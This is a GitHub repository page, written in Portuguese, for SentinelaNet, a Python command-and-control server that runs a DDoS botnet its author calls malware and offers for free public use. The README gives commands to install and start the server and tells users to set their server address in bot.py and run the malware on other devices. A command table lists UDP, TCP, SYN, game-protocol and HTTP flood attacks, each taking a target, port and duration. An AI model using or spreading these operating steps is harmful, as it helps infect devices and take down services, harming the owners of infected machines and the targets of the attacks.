Skip to content

SentinelaNet é uma CNC (Comando e Controle) em Python, projetada para gerenciar um malware que realiza ataques de disparos em massa (DDoS).

Notifications You must be signed in to change notification settings

CirqueiraDev/SentinelaNet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 

Repository files navigation

SentinelaNet

SentinelaNet é uma CNC (Comando e Controle) em Python, projetada para gerenciar um malware que realiza ataques de disparos em massa (DDoS).

Esta Botnet é para ser uma versão aprimorada do KryptonC2 e será disponibilizada publicamente e de forma gratuita. Vou hospedá-la e permitir que os usuários a utilizem sem a necessidade de compra.

Quero usar ou testar o SentinelaNet


Instalação 📁

git clone https://github.com/CirqueiraDev/SentinelaNet
cd SentinelaNet
pip install colorama
python3 cnc.py <port>

Os logins são salvos em logins.txt no formato "username:password" dentro do arquivo logins.txt


Configure o malware 💣

Mude o IP e a porta do bot.py com o IP (IP publico se não for um teste local) e a porta do seu servidor CNC depois salve o arquivo.
Depois execute o malware em outro dispositivo que suporte python (caso o alvo não tenha o python você pode compilar o malware)

CNC Commands

Command Description
help, ? Shows list of commands
botnet Shows list of botnet attack methods
bots Shows all conected bots
clear, cls Clears the console window screen
exit, logout Disconnects from the C&C server

Attack Commands

Command Usage Description
.UDP <target> <port> <time> Starts UDP Flood
.TCP <target> <port> <time> Starts TCP Flood
.SYN <target> <port> <time> Starts TCP SYN Flood
.VSE <target> <port> <time> Send Valve Source Engine Protocol
.MCPE <target> <port> <time> Minecraft PE Status Ping Protocol
.FIVEM <target> <port> <time> Send FiveM Status Ping Protocol
.ROBLOX <target> <port> <time> Starts ROBLOX UDP Flood
.HTTPGET <target> <port> <time> Starts HTTP/1.1 GET Flood
.HTTPPOST <target> <port> <time> Starts HTTP/1.1 POST Flood
.BROWSER <target> <port> <time> Starts HTTP/1.1 BROWSER Simulator Flood

Owner

About

SentinelaNet é uma CNC (Comando e Controle) em Python, projetada para gerenciar um malware que realiza ataques de disparos em massa (DDoS).

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages